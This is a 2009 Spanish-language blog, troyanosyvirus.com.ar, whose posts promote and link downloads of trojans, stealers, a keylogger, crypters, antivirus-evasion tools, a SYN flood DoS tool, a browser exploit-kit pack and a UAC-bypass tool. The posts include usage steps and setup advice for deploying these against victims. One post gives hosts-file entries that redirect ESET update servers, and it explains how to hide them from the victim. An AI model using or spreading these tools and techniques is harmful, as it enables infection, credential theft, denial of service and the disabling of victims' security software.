TROYANOSYVIRUS.COM.AR

Source Undetector 0.1

2009-07-10T17:20:00.006-03:00

Source Undetector es una aplicacion programada por mFmTGL para dejar indetectable y encriptar otras aplicaciones programadas en visual basic 6.

Características Generales:
Advanced Browsing: Esto nos permite una más fácil edición de sources, gracias al intuitivo menú parecido al de Visual Basic ubicado en el frame Browse Project
Syntax Editor: Algo que no podía faltar, tambien nos da más comodidad debido a que es similar al de Visual Basic.
Beautiful Design: Para comodidad de los usuarios se ha hecho un diseño muy agradable, con iconos, imágenes, botones 3D, etc.
Update Checker: Opcional, lo que hace es verificar si deseamos si hay una nueva versión.

Características para indetectar manualmente:
Scramble Code: Una opción que desordena las lineas. Esto es para hacerlo con las declaraciones API, ya que si no se tiene experiencia y se realiza en un código el programa puede quedar no funcional. (Uso: Seleccionar Lineas --> Click Derecho --> Scramble Line Order)
Complex Code: A mi opinión la mejor función de todas, el Complex Code. Lo que hace esta opción es hacer "RIT" con cada una de las lineas seleccionadas gracias a la función GOTO. Agrega también Junk Code para saltarse las heurísticas. (Uso: Seleccionar Lineas --> Click Derecho --> Complex Code (Goto's))
String to Chr: Lo que hace esta función es transformar a caracteres la string seleccionada, es para saltarse la detección de Strings de algunos antivirus. (Uso: Seleccionar la string desde el " hasta el otro " --> Click Derecho --> String to CHR)
String Reverse: Similar a la función de arriba, solo que pasa la string al reves y luego por la funcion StrReverse la regresa a estado original. (Uso: Seleccionar la string desde el " hasta el otro " --> Click Derecho --> String Reverse)
Encrypt String: Lo que hace esta función es encriptar la string con Xor con una key a elección. (Uso: Seleccionar la string desde el " hasta el otro " --> Click Derecho --> Encrypt String --> Seleccionar Key --> Aceptar. Después agregar en algún módulo la función XOR haciendo click derecho y tocando Add Xor Function)
Add Junk Code: Esta función agrega código basura en una parte del código deseado. (Uso: Se pone el cursor en una linea en blanco donde se insertara el código basura, se hace click en ella y luego click derecho --> Add Junk Code)

Características para localizar firmas:
Comment Line: Esta opción lo que hace es comentar las lineas deseadas, es decir, que al compilar el proyecto este código no sera puesto en el binario. Si bien no funcione la función que se comento, sirve para localizar la firma. (Uso: Seleccionar lineas deseadas desde el principio --> Click Derecho --> Comment Line).
UnComment Line: Esto hace exactamente lo contrario a lo de arriba, descomenta las lineas seleccionadas. (Uso: Seleccionar lineas deseadas desde el principio --> Click Derecho --> UnComment Line).

Características para indetectar (Procesos SemiAutomáticos para TODO el proyecto)
Crypt all strings: Muy pero muy útil. Lo que hace es encriptar TODAS LAS STRINGS del proyecto permitiendo seleccionar la key. No encripta API's, esto facilita que no se necesita comprobación sino que se hace un proceso automático.(Uso: Click en Crypt all strings --> Seleccionar la Key --> Click en Re-Encrypt Strings --> Click en Confirm)
Reverse all strings: Similar a la función de arriba, solo que pasa la string al reves y luego por la funcion StrReverse la regresa a estado original. (Uso: Click en Reverse all strings --> Click en Confirm)
All Strings to Char: Lo que hace esta función es transformar a caracteres todas las strings, es para saltarse la detección de Strings de algunos antivirus. (Uso: Click en All strings to Char --> Confirm)
Randomize Function Names: También es de las funciones que más me gustan. Lo que hace es cambiar el nombre de TODAS las funciones. NOTA: No de los SUBS. (Uso: Click en Randomize Function Names --> Confirm)
Add Modules: Me gusta mucho también, agrega modulos al proyecto.
Add Class Modules: Hace lo mismo que la de arriba, solo que agrega Módulos de clase.

Nota:Se pide el favor de aportar sugerencias y reportar los bugs que se encuentren.
Para el correcto uso de la aplicación se necesita registrar los ocx. Para realizarlo registrar las ocx que vienen dentro de la carpeta OCX.
Cualquier duda sobre esto avisar.
En lo personal recomiendo crear en su disco una carpeta llamada OCX y ahí mover el contenido y ejecutar el register.exe y clickear el boton de Register.

Source Undetector 0.1 (rapidshare)
Source Undetector 0.1 (megaupload)
pass: troyanosyvirus.com.ar

Troyano Lost door v 4.0 Pro

2009-07-02T01:07:00.003-03:00

Hoy dia salio la nueva version del Lost door, la v4.0 pro, un troyano con muchas herramientas.
En esta nueva version se agrego un spread MSN automatico, obtiene la ventana activa, se mejoro la GUI, y "dicen" que se mejoro la estabilidad.

El troyano se caracteriza por sus 3 spreads, P2P, MSN, y USB. Su GUI es muy simple y ademas esta en español, asi que deberia ser facil de utilizarlo.

Caracteristicas oficiales:

[+] Reverse Connection
[+] Webcam Shot
[+] Date& time Manger
[+] printer
[+] Control pannel
[+] Pc control
[+] Exucutor
[+] Dos command
[+] Windows manager
[+] Screen Shot
[+] Remote server manager
[+] Server remover
[+] Ip Graber
[+] Server Downloader
[+] Icon Changer
[+] Audio Streaming
[+] Encrypt Settings
[+] Volume Control
[+] Connection Logs
[+] Instaled Appliction
[+] Infect All USB
[+] P2P Spreading
[+] Msn Spreading
[+] Multilanguage
[+] Services Viewer
[+] Remote passwords
[+] MSN Controler
[+] Remote Shell
[+] Chat with server
[+] Send fake messages
[+] files manager
[+] Find files
[+] Change remote screen resolution
[+] Information about remote computer
[+] Clipboard manager
[+] IE options
[+] Running Process
[+] Troyanosyvirus.com.ar
[+] Online keylogger
[+] Offline keylogger
[+] Fun Menu
[+] Remote Nat viewer
[+] Rmote Resotr Manager
[+] Added Some Graphics
[+] Some minor Bugs fixed
[+] Some Forms Has Been Modified
[+] News Navigator was Added
[+] Invisible in Searching Files
[+] Server Size (120kb)

¿Mi opionion?
Un troyano muy completo en funciones y herramientas, pero poco estable y seguro, ademas no funciona bien en windows vista, lo recomendaria solo como troyano secundario.

Descarga
Lost door v 4.0 Pro (rapidshare)
Lost door v 4.0 Pro (megaupload)
pass: troyanosyvirus.com.ar

Creacion de worms en VB by Hendrix

2009-06-25T00:22:00.007-03:00

Este es un paper creado por Hendrix para Abril negro 2006 del foro elhacker.net, en el manual se explica los conceptos basicos para crear un worm en visual basic 6, esta muy bien explicado, sobre todo para los que recien se inician con la programacion.

Indice

1. Cosas basicas de un buen Malware
2. Dificultar la desinfeccion del Worm
3. Propagacion por redes P2P
4. Propagacion por MSN
5. Encriptacion Anti-Huristica de los AV's
6. Firmas en el PC
7. Propagacion por e-mail (esta aun la tengo que aprender)
8. Infeccion de archivos .exe y archivos .rar
9. Sorpresitas en el code del Worm

En el manual se trata de explicar el principio de funcionamiento basico, pero si quieren que el worm funcione al 100% hay que mejorar el codigo un poco, por ejemplo usando variables de sistema, teniendo en cuenta que no todas las pcs tienen como idioma el español, hay que hacerlo compatible con windows vista, etc.
Tambien recomendaria cambiar la propagacion por MSN, usando la Messenger API Type Library, con esto tendria que funcionar bien en todas las pcs con windows y msn live hoy en dia. En ESTE LINK pueden ver ejemplos del uso de esta api.
En fin, se le pueden mejorar muchisimas cosas, incluso agregarle otros metodos de propagacion como pueden ser por USB, o por LAN que son muy populares hoy en dia.

Descarga
Creacion de worms en VB (rapidshare)
Creacion de worms en VB (megaupload)

Cualquier duda la comentan, y diganme si les gusta este tipo de aportes.

Jodedor 5X1

2009-06-18T11:30:00.006-03:00

Hoy salio una nueva herramienta de m3m0_11, el Jodedor 5x1, llamada 5x1, por las 5 herramientas que posee en una sola. Es un Crypter, joiner, downloader, packer.
Cada una de sus herramientas es bastante completa en funciones, por ejemplo en el binder permite seleccionar donde extraer, el metodo de ejecucion (permite inyectarse en un proceso), tiempo de espera, etc.
Los 4 stubs son indetectables y tienen un peso relativamente pequeño que ronda por los 11kb aproximadamente.

El Jodedor 5x1 posee las siguientes herramientas:
Crypter: Encripta archivos para protegerlo y dejarlos indetectables.
Joiner: Junta 2 o mas archivos en un unico archivo.
Downloader: Descarga uno o mas archivos y posteriormente los ejecuta.
EOF writter: Agrega EOF al archivo.
Packer: Comprime el archivo.

Al dia de hoy es indetectable, que dure unos dias por lo menos!

Descarga
Jodedor 5X1 v0.1 (rapidshare)
Jodedor 5X1 v0.1 (megaupload)

Control codejock (necesario)

pass: troyanosyvirus.com.ar

Pasen por la web del autor: www.jodedorsoftware.tk

SYN Flood DoS

2009-06-11T01:05:00.006-03:00

SYN Flood DoS es un programa creado por defc0n1 para hacer Denegaciones de servicio mediante inundación de paquetes SYN. Estos paquetes SYN son peticiones de conexión, y tienen IPs de origen falsas por lo que la conexión nunca se realiza y queda a la espera. Cuando se han enviado miles de peticiones el servidor queda colapsado y no acepta nuevas conexiones.

Caracteristicas
- Es mucho mas efectivo cuando se hacen ataques desde varios puntos (DDoS)
- Al haber miles de intentos de conexión desde IPs falsas y solo haber varias verdaderas (las de los atacantes) es muy complicado que el IDS o el Administrador del sistema pueda localizar a los atacantes reales.
- Esta basado en Nmap con el uso de Decoys
- Envia 115 SYN por cada Scaneo, es decir, aproximadamente cada medio segundo dependiendo de la potencia del ordenador y de la red.

Modo de uso
1- Abre el programa, y espera a que este cargado del todo (tarda un poco porque contiene Nmap completo, y tiene que descomprimir y cargar todos los archivos)
2- Si es la primera vez que lo abres y no tienes WinPcap instalado te saldrá el siguiente aviso:

(( WARNING! It seems that you have not installed WinPcap. Its neccesary to run the DoS, do you want to install it now? Y/N: ))

Ponemos Y, le damos a enter y lo instalamos
Si lo tienes ya instalado dale a N y continua
3- Te dice que introduzcas el Target (objetivo), pues pones la IP (Por ejemplo 192.168.1.1) o el DNS (http://www.sgae.es/) que quieras atacar.
4- Tienes que poner el puerto a atacar. Si es una Web es el Http (80), pero si quieres atacar otro servicio como FTP (21) o Telnet (23) tendras que poner su puerto. Evidentemente, el puerto tiene que estar abierto y a la escucha.
5- Cuando ponga "DoSing the target ;-)" y abajo salgan los escaneos de Nmap constantemente, ya estas atacando a la victima

Texto escrito por el autor defc0n1

El programa debe ser usado solo para testear sus propios servidores o redes, estos ataques pueden ser evitados.
Recomiendo buscar informacion sobre este tipo de dos, pueden ver en wikipedia el funcionamiento basico: en español o en ingles pero mas especifico.

Descarga
SYN Flood DoS (rapidshare)
SYN Flood DoS (megaupload)
pass: troyanosyvirus.com.ar

Offsets locator by kox

2009-06-02T02:21:00.005-03:00

Offsets locator es un autorun creado por kox que contiene una recopilacion de las herramientas mas populares para modificar archivos ejecutables para dejarlos indetectable a los antivirus.
Con estas herramientas basta para dejar cualquier archivo indetectable a cualquier antivirus que utilize el metodo de firmas para detectar virus.

El pack incluye los siguientes programas:
AAVTools 2008
AAVTools 2009
AspackDie
AV Devil 2.1
AVFucker 1.1.1
AVFucker 1.1.2
DSplit
Hash Y cryptor Detector
LordPE
OllyDRX Lite FzF version
Offset Locator v.3.0
OffsetRemover
PEiD-0.94
RDG Packer Detector v0.6.6 2k8
Troyanosyvirus.com.ar
Reshacker
SignatureZero Español
SignatureZero Inglés
UKspliter
Unpacker armadillo
Zenyth AV Tool

Recomendar para tener siempre a mano sobre todo para los que modifican crypters o malware, y no tener que estar buscando una por una todas las herramientas.

Descarga
Offsets locator by kox (rapidshare)
Offsets locator by kox (megaupload)
Pass: troyanosyvirus.com.ar

Tambien recomiendo leer para usar las herramientas correctamente:
Método MEEPA by MazarD
Haz indetectable cualquier troyano by octalh (metodo rit)
Dejando indetectable el poison ivy al nod32 con signaturezero

Royal stealer 2.0

2009-05-21T23:44:00.005-03:00

Hoy salio la nueva version del Royal stealer, un stealer programado por el español Sharky.
A diferencia de su version anterior Royal Stealer v1.0, esta sube los logs a un servidor FTP, lo que evita el uso de cuentas de correos.

Tambien se agrego la opcion de propagar el stealer por Ares y por Emule y permite seleccionar donde guardar el stealer para que se inicie con windows, opcion que a veces no es muy recomendada, por que lo unico que hace es llenar el espacio del servidor FTP.

El Royal stealer 2 envia los siguientes logs o contraseñas:

MSN messenger, Live messenger.
Firefox
Internet Explorer
CD-Keys de Juegos
CD-Keys de Softwares
No-Ip

Ahora los logs tambien se envian encriptados por lo que se requiere utilizar la pestaña Visor de log's de la herramienta para poder verlos.

Le agregue las dependencias necesarias a las descargas para que funcione bien en cualquier pc

Descarga
Royal stealer 2.0 (pagina oficial)

Pasen por la web de sharki http://www.sharki.es

Pack de exploit rusos para navegadores

2009-05-15T13:56:00.006-03:00

Esta es una recopilacion de los exploit rusos para navegadores mas conocidos, la funcion basica de estos exploit es explotar fallas en navegadores, para ejecutar archivos .exe sin autorizacion del usuario de forma totalmente invisible.

My poly sploit

El pack incluye los siguientes exploit:

0x88
adpack-1
adpack-2
armitage
cry217
fiesta-1
fiesta-2
firepack-1
firepack-2
g-pack
ice-pack-1
ice-pack-2
ice-pack-3
infector
mpack
mpack-081
mpack-086
mpack-091
mpack-099
multisploit
my-poly-sploit
rds
smartpack
target-exploit
tor
unkown

Todos estos exploit son del 2008-2009, y funcionan bien en muchas pcs, aunque el porcentaje de infeccion es bajo debido a los parches en los navegadores, pero algunos estan funcionando bien con Internet explorer 7 y firefox 3 sin actualizar, que son los navegadores mas utilizados hoy en dia.

Ice pack:

Para los que nunca administraron una web, o no tienen idea de programacion tal vez se les haga dificil entenderlos, pero la configuracion de estos exploit es muy simple. Basta con subir todos sus archivos a un servidor que soporte el uso de base de datos, y buscar el archivo config.php, settings.php o similar y editar alli la configuracion de los exploit, tambien deberan crear una base de datos en su host para almacenar los datos, si no no funcionara.

Lo que es configuracion esta todo en ingles, en algunos para la parte de estadisticas pueden ver que esta en ruso, pero no es necesario entender ruso ya que son palabras simples y al hacer click facilmente se puede saber su significado, por ejemplo si lo que quieren es ver cantidad de infectados o pais de donde provienen. Lo que realmente importa esta en ingles.

Mpack: estadisticas

Y como dije antes no recomiendo este tipo de exploit para infectar alguien en especifico, porque no sirve para eso.

Y dejo a los usuarios que vean cada exploit para ver cual es el mejor, los exploit generalmente se encuentran en una carpeta todos juntos, y se puede ver a que navegadores afecta, no puedo poner las caracteristicas de cada uno porque si no no termino mas. Si no para cualquier pregunta, estan los comentarios.

Descarga
Pack de exploit rusos (rapidshare)
Pack de exploit rusos (megaupload)
pass: troyanosyvirus.com.ar

Recomiendo leer FirePack Lite v.0.11, encontraran mas informacion sobre el firepack 0.11, que es (o fue jaja) uno de los mas populares.

La recopilacion fue obtenida de un usuario ruso de opensc.ws

4n0-KeyFTP v1.4

2009-05-07T00:01:00.000-03:00

4n0-KeyFTP v1.4 es la nueva version del keylogger FTP de 4n0nym0us. En esta nueva version se corrigieron algunos bugs, se lo tradujo al ingles y se agrego encriptacion en los logs para mejorar la seguridad de los mismos. Tambien se dejo el stub 100% indetectable.

Un keylogger captura las teclas pulsadas en la pc donde se instalo, y en este caso las sube a un servidor FTP definido por el usuario.

Para crear el server solo se debe crear una cuenta en alguna web donde den un servidor ftp gratuito como miarroba.com o lycos.com, despues colocamos los datos donde dice configuracion del servidor y damos click a construir, eso es todo.

Para ver los logs conectamos al servidor FTP, mediante cualquier cliente o navegador o directamente desde el keylogger, descargamos el o los archivos .dat y hacemos click en la pestaña logs del keylogger, despues abrimos el archivo .dat que descargamos y los logs apareceran ya desencriptados en pantalla. Sin son varios tienen que ver uno por uno.

Descarga
4n0-KeyFTP v1.4 (rapidshare)
4n0-KeyFTP v1.4 (megaupload)
pass: troyanosyvirus.com.ar

ZM Proxy 1.0 - Proxy para RAT

2009-04-28T00:20:00.003-03:00

ZM Proxy es el primer sistema de proxy diseñado para redireccionar y administrar conexiones de programas de administracion remota (RAT) de conexion inversa.

Un proxy permite a otros equipos conectarse a una red de forma indirecta a traves de el. En este caso las conexiones de todos los servidores seran redirigidas por el ZM proxy hacia el cliente, tambien se enviaran los datos que envien los servidores al cliente y viceversa. El esquema basico de conexiones seria como se muestra en la siguiente imagen.

En la imagen anterior los servidores pueden ser servidores de algun RAT o troyano, como por ejemplo Poison Ivy, y el ZM proxy puede estar en un servidor VPS, en una pc abandonada, o simplemente en alguna pc normal. El cliente podria ser el cliente del Poison Ivy escuchando en el puerto que conecta el ZM proxy.

ZM proxy puede usarse para formar cadenas de proxy, esto quiere decir que un ZM proxy puede conectarse a otro ZM proxy y asi infinitamente hasta conectarse con el cliente, obiamente esto disminuye la velocidad de transferencia entre servidor y cliente pero se aumenta enormemente la indetectabilidad y seguridad, en la siguiente Imagen pueden ver como seria el esquema de conexiones basico formando una cadena de proxy.

Algunos usos de ZM Proxy
-Ocultar la ip del cliente de un troyano, y evitar posibles rastreos.
-Aumentar la seguridad del usuario.
-Redirigir conexiones, puede ser utilizado para redirigir conexiones de pcs en una red donde es imposible la conexion al exterior, o en maquinas virtuales donde se bloquean los puertos.
-Administrar programas que se controlen por comandos como botnets o sistemas de chat.

ZM proxy Utiliza el mismo sistema que utilizan los RAT y troyanos de conexion inversa para enviar y recibir datos, por lo que no deveria haber ningun inconveniente con ninguno de ellos para enviar y recibir datos.

Modo de uso basico
Click en Conectar, escribimos el puerto en el cual escuchara el ZM proxy, este tiene que ser el puerto al cual conectan los servidores (deben abrir o mapear este puerto si tienen router o si es necesario).
En ip y puerto colocamos el dominio o ip y el puerto al cual se reconectaran todos los servidores, la ip debe ser la ip donde se encuentra el cliente, y el puerto debe ser el puerto en el cual esta escuchando el cliente (este puerto tambien debe estar abierto si es necesario), es el puerto por el cual conectara al cliente.

En el listview principal podremos ver como se conectan los servidores, apareceran sus ips y los datos que envia el servidor al cliente (Servidor >>> Cliente) y los que envia el cliente al servidor (Servidor <<< Cliente). En la primera imagen se pueden ver unicamente caracteres sin sentido, esto debe a que el poison ivy envia la informacion encriptada, pero si se utilizara un troyano mas basico se podrian ver los comandos del mismo y la informacion que envia de forma mas clara.

Debajo se encuentra una caja de texto cuya funciona basica es enviar datos a los clientes (>) o a los servidores (<), pueden seleccionar a quien enviar los datos. Solo escriben la linea de dato a enviar y seleccionan a quien enviar en el listview y a la par de la caja de texto seleccionan si van a enviar los datos a los clientes o servidores y dan clik en el boton Enviar. Esto puede ser utilizado para administrar cualquier tipo de programa que funcione mediante comandos, como por ejemplo un chat o una botnet. Proximamente un manual mas completo.

En la siguiente imagen se ve como se redirecciona todas las conexiones de los servidores del Poison Ivy 2.3.2 a su cliente pasando por el ZM proxy antes en localhost, pueden ver que todas las ips WAN de los servidores del poison son iguales debido al proxy.

Para cualquier duda o lo que sea estan los comentarios, acepto criticas, sugerencias para la proxima version, posibles bugs del programa, etc

Descarga
ZM Proxy 1.0 (rapidshare)
ZM Proxy 1.0 (megaupload)
pass: troyanosyvirus.com.ar

Masa crypter 2.0

2009-04-19T19:02:00.003-03:00

Les presento la segunda version del Masa crypter programado por Masangel, un crypter FUD al dia de hoy, con catacteristicas muy basicas:

-Soporta EOF, tambien lo detecta
-Realinear el PE
-Cambiear OEP

No hay mucho mas que decir sobre este crypter, pasen por la web de su autor masasoftware.blogspot.com

Descarga
Masa crypter 2.0 (rapidshare)
Masa crypter 2.0 (megaupload)
pass: troyanosyvirus.com.ar

Evitar actualizacion de los antivirus mediante Hosts

2009-04-15T15:06:00.001-03:00

Una de las tecnicas mas usadas para evitar la actualizaciones de los antivirus y demas programas de seguridad consiste en modificar el archivo Hosts de windows para que los antivirus al resolver los DNS donde tienen sus actualizaciones obtengan una ip falsa, y asi evitar que se actualizen.

Ahora no explicare como funciona este archivo Hosts, pero recomiendo que lean "El Pharming y sus consecuencias" para saber todo lo que necesitan saber sobre este archivo, ya que escribire como si supieran esto (es algo muy basico).

Ejemplo
El antivirus Nod32 utiliza varios servidores para realizar sus actualizaciones, entonces si agregamos cada uno de los dominios de dichos servidores al archivo hosts acompañados de una ip falsa cualquiera a su izquierda, cuando el antivirus requiera actualizacion siempre "revisara" de alguna manera el archivo host para verificar si existe alguna coincidencia del dominio requerido, y al ver que existe coincidencia con el dominio intentara conectarse a la IP que se le asigno a la izquierda del dominio, como en esa IP no se encuentran los archivos necesarios para la actualizacion, esta no podra realizarse y generara un error. En caso de que no se hubieran escrito esas lineas con los dominios de las actualizaciones y las ips falsas en el archivo Hosts windows se encargaria de resolver los host automaticamente y si fuera asi obtendria la ip real de ese dominio. Ademas hay que tener en cuenta que el antivirus prueba con distintos dominios por si no funcionan, asi que deben estar todos en el archivo hosts, porque si encuentra alguno y no esta con una ip falsa en el archivo hosts automaticamente resolvera el host y procedera a realizar las descargas de dichas actualizaciones.

IP DNS
127.0.1.1 u20.eset.com
127.0.1.1 u21.eset.com
127.0.1.1 u22.eset.com
...

Este metodo tambien puede utilizarse para evitar las webs de antivirus online como virustotal o novirusthanks, asi cada vez que la victima quiera ingresar en esas webs le de error de que no se encontro el servidor. Tambien servira por si quieren descargar antivirus de sus webs oficiales o simplemente no podran pedir versiones trials, porque para ello necesitan autorizacion del servidor y nunca se podra establecer la conexion.

Proyecto SinAV
SinAV es un proyecto en Visual Basic 6 que hace la tarea automatica de agregar los DNS e ips falsas al archivo Hosts, se trato de agregar los DNS de las descargas de los antivirus mas usados, ademas se agrego sus paginas oficiales y mas servidores como por ejemplo para compras o descargas de pruebas y algunos por ubicacion, como .com.ar o .es, tambien pueden encontrar algunas webs de escaneo online, esta optimizado para funcionar en Win XP, 2000, 2003, NT, y en Vista con permisos de administrador (pueden usar el vista UAC maker).
La aplicacion ademas agrega 100 lineas vacias antes de agregar los DNS y las IPS, para confundir a la victima, y se cierra al terminar de agregar todas las lineas. Se utiliza un timer y La direccion del archivo Host esta encriptada para evitar los antivirus, de nada sirve esto si es detectado jaja.
Obiamente pueden agregarle mas funciones al proyecto y modificarlo como quieran.

El archivo esta 100% indetectable, dudo que dure mas de una semana si lo usan, pero se deja indetectable facilmente, ya que no es una aplicacion que se pueda llamar peligrosa.

Descarga codigo fuente + compilado
SinAV - Evitar actualizacion de los antivirus (rapidshare)
SinAV - Evitar actualizacion de los antivirus (megaupload)
pass: troyanosyvirus.com.ar

TYV Crypter 1.0

2009-04-03T17:04:00.003-03:00

TYV crypter es un nuevo encriptador creado por m3mo_11 especialmente para los usuarios de troyanosyvirus.
El crypter se destaca por sus 2 metodos de encriptacion o stubs, CryptApi y RC4 pudiendo cambiar la clave de encriptacion, posee un "Anti debugging" basico y la posibilidad de encriptar archivos que poseen EOF data como bifrost, tambien se puede seleccionar el icono del archivo de salida.

Al dia de hoy es 100% indetectable y supongo que soporta todos los troyanos que pueden encontrar en el blog. Esperemos que dure un buen tiempo indetectable.

Descarga
TYV crypter 1.0 (rapidshare)
TYV crypter 1.0 (megaupload)
Pass: troyanosyvirus.com.ar

Cactus Metamorph 0.3

2009-04-01T17:21:00.001-03:00

Cactus Metamorph 0.3 es la ultima version de este fabuloso programa creado por MadAntrax, un reconocido usuario de elhacker.net, ahora no explicare lo que hace el programa ya que el autor creo una extensa descripcion del mismo, y quien mejor que el para explicar todo sobre su herramienta, asi que solo pondre la descripcion que dio el. De todas formas al final dare mi opinion sobre el Cactus metamorph 0.3.

-----> De ahora en adelante texto escrito por el autor MadAntrax

Listado de funcionalidades 0.3
[ + ] Modificar TimeDateStamp Permite modificar las fechas de creación, acceso y modificación del fichero final
[ + ] vMap: Offset Pointer (Muestra de forma gráfica que zonas del código se han modificado)
[ + ] Sistema de Log's (Genera y guarda un log con los cambios realizados al fichero, junto con TODOS sus offset's modificados)
[ + ] Virtual EOF (añade hasta 25 Kbytes de código adicional, altera el tamaño)
[ + ] Clonación de Código: Permite modificar el ejecutable con partes del código de otro ejecutable inofensivo
[ + ] Diccionario Estático: Selecciona de forma aleatoria un carácter hexadecimal para modificar el fichero
[ + ] Botón 'Detener': para finalizar el proceso de Metamorph en cualquier momento
[ + ] Ayuda Dinámica: Pulsar los botones '?' para ver la ayuda
[ + ] Mejoras en la GUI: Barra de título animada.
[ + ] Mejoras en la GUI: Añadida ventana de "About" con efecto petardos xD
[ + ] Mejoradas las estadísticas, ahora son más eficientes
[ + ] Mejoras en el código interno, los bucles y condiciones son ahora más estables y rápidos
[ + ] Se han cambiado los valores hexadecimales de los diccionarios
[ + ] Aumentados y mejorados los niveles de Ofuscación

Descripción
Este sencillo programa permite modificar un archivo ejecutable compilado (binario) para alterar su estructura interna sin modificar el tamaño original (ni aumentan ni disminuyen los bytes finales). No añade ningún Stub ni descomprime código en tiempo de ejecución. Si modificas 2 veces un mismo archivo obtendrás 2 ficheros distintos, nunca obtendrás 2 copias idénticas de un mismo fichero. Ahora como novedad podrás aumentar el tamaño del fichero modificado, añadiendo hasta 25 Kbytes de datos adicionales. También podrás usar partes del código de otra aplicación inofensiva para modificar tu ejecutable, de esta forma tu 'malware' tendrá partes de código de otra aplicación 'normal' y podrás despistar algo mejor a los Antivirus. Se ha añadido el módulo vMap que muestra en pequeñas celdas las zonas de código que se han modificado, permite también generar y guardar un archivo .log con todos los datos y modificaciones hechas al ejecutable, junto con el listado COMPLETO de los offset's modificados. De esta forma podrás utilizar el listado de offset's para modificar manualmente el mismo ejecutable sin necesidad de lanzar el proceso de nuevo o para integrarlo con otras tools.

Se ha añadido un nuevo modulo llamado 'Modificar TimeDateStamp'. Esto nos permite generar una fecha aleatória y establecerla como fecha de creación, acceso y modificación del fichero. De esta forma la víctima no sospechara si ve un fichero en su sistema con una fecha antigua. Además hay AntiVirus que no escanean ficheros con fechas muy inferiores. A parte permite dejar más modificado el ejecutable.

Para que sirve?
Los AntiVirus detectan un archivo malicioso si encuentran en su interior un patrón de datos que los identifican como tal. Un simple ejemplo:

fichero1

01010101011101010101

Los AntiVirus almacenan en su fichero de firmas un patrón que les ayuda ha identificar un archivo malicioso (firma), en este ejemplo diremos que es 01110. Bien, si yo consigo detectar cual es el patrón que delata a mi fichero malicioso y consigo cambiarlo un poco obtendré un fichero inocuo al AntiVirus, por ejemplo:

fichero2

01010101011111010101

Al realizar está técnica pueden ocurrir 3 cosas:

El fichero final se ha modificado perdiendo su funcionalidad
El fichero final se ha modificado manteniendo su funcionalidad, pero los AV lo siguen detectando
El fichero final se ha modificado manteniendo su funcionalidad, y los AV NO lo siguen detectando

Está claro que nosotros queremos llegar al 3º punto, pero no es una tarea sencilla: Hay que ir modificando los Offset's del fichero hasta dejarlo ligeramente modificado, sin "romper" el ejecutable y que el AV no lo detecte. Bien, pues Cactus Metamorph realiza esta tarea de forma automatizada y en pocos segundos.

Como funciona realmente?
Cactus Metamorph coge un fichero compilado (*.exe) y examina TODOS Y CADA UNO de los Offset's del fichero, intentando modificar aquellos que no comprometen la estabilidad ni el funcionamiento del fichero, dejándolo intacto en cuanto a funcionalidad, pero modificado en cuanto a su estructura.

Cabe destacar que Cactus Metamorph no utiliza Stub's, no añade código adicional al ejecutable final, no comprime su estructura ni la expande. No altera su tamaño, deja y respeta hasta el último byte del fichero original (en la versión 0.2 puedes añadir código, modificando los últimos bytes). Después de la metamorfosis, el fichero final cambia por completo, modificando su MD5, CRC32, etc...

Entonces... ¿este programa deja indetectable cualquier fichero o troyano?
No, y lo repito 100 veces más: NO. Cactus Metamorph no asegura que el fichero final vaya a quedar indetectable, es más, si intentas usar este programa con ficheros famosos (Poison Ivy, Bifrost, etc...) no conseguirás nada, pues estos ficheros tienen las firmas en los Offset's vitales del fichero, si se intentan modificar se vuelven inestables y no funcionan.

Este programa te permitirá modificar de forma masiva aquellos Offset's que no son vitales de un ejecutable y dependiendo de cada caso obtendrás:

Un fichero funciona indetectable
Un fichero funcional detectado
Un fichero no funcional (roto)

Dependiendo del nivel de Ofuscación y del Tamaño del Diccionario obtendrás un fichero más o menos modificado. En el cuadro de estadísticas obtendrás un valor llamado Total Offsets que indica cuantos Offset's se han modificado. Cuanto mayor es ese número mejor. Cada vez que uses este programa generará un fichero completamente distinto al anterior con un MD5 distinto. Disfrútalo

Bueno, dejo ya de escribir, espero que haya quedado claro más o menos cómo funciona el programa. Os recomiendo que lo probéis, modifica un fichero y lo subes a virustotal.com para ver si has conseguido "burlar" algún Antivirus.

----> Hasta aqui texto escrito por MadAntrax

En mi opinion es un muy buena herramienta, ya lo era su version anterior, por las pruebas realizadas no sirve para dejar algun virus 100% indetectable, pero ayuda a quitar antivirus por firmas, ademas modifica muy bien el codigo, esto convinado con un buen crypter puede tener resultados muy favorables, solo es cuestion de hacer pruebas convinandolo con distintos programas.

Descarga
Cactus metamorph 0.3 (rapidshare)
Cactus metamorph 0.3 (megaupload)
Pass: troyanosyvirus.com.ar

VistaUACMaker Bypass UAC

2009-03-21T00:36:00.000-03:00

A medida que avanzan los años el Windows vista se hace mas utilizado por los usuarios, y el problema esta en su nuevo sistema de seguridad UAC (User Account Control).

Este sistema impide muchas acciones, entre ellas no permite modificar o escribir en el registro de windows, y copiar archivos a directorios determinados, como el disco local, windows, system32, program files, etc.

Y como muchos sabran la mayoria de los troyanos y virus se copian a estas carpetas, para iniciar con windows se requiere escribir el registro.
Es el caso tipico de Poison ivy o Bifrost, estos troyanos funcionan bien en vista, pero al reiniciar la pc si tienen activada la UAC generalmente no vuelven a iniciar, como si nunca se hubieran infectado, porque el servidor nunca se logro copiar a system32 o agregarse al registro como deberia. Tambien si se quiere subir archivos o modificar algo en las carpetas que tienen privilegios de administrador mostrara un error, lo mismo en el registro.

Para solucionar este problema se puede agregar un manifest como el de la siguiente imagen (lo pueden copiar en los comentarios).

VistaUACMaker lo que hace es agregar ese manifest de forma automatica al archivo, para que se ejecute con los privilegios que sean nesesarios.

Para usarlo simplemente dan click en "Select.." y luego "Make it" y tendran el nuevo archivo preparado para utilizar en vista, con los privilegios que sean nesesarios.

Para los que programan malware, la UAC no tendria que generar problemas, ya que se puede modificar HKCU sin permisos, tambien se puede escribir sobre carpetas comunes como ProgramDatta. La UAC es un buen sistema de seguridad, pero solo para malware antiguo, hoy en dia es muy facil saltearselo.

Descarga
VistaUACMaker (rapidshare)
VistaUACMaker (megaupload)

Recomiendo crear algun programa simple que copie algun archivo a la carpeta windows para testear el programa, ya que testearlo con un malware no es buena idea si no se conoce perefectamente.

Royal Stealer v1.0e

2009-03-13T01:29:00.005-02:00

Esta es la ultima version del stealer de Sharki, terminada hoy. Se agregaron 2 cuentas de gmail y hotmail, para que solo con ingresar el correo del usuario sirva para enviar los datos. Ademas se corrigieron algunos bugs y ya se podria considerar una version estable.

El stealer envia por email todas las contraseñas y claves guardadas siguientes.

- Personalizado :

En esta opcion se puede incluir una clave de registro manualmente
en las opciones del stealer.

- Softwares :

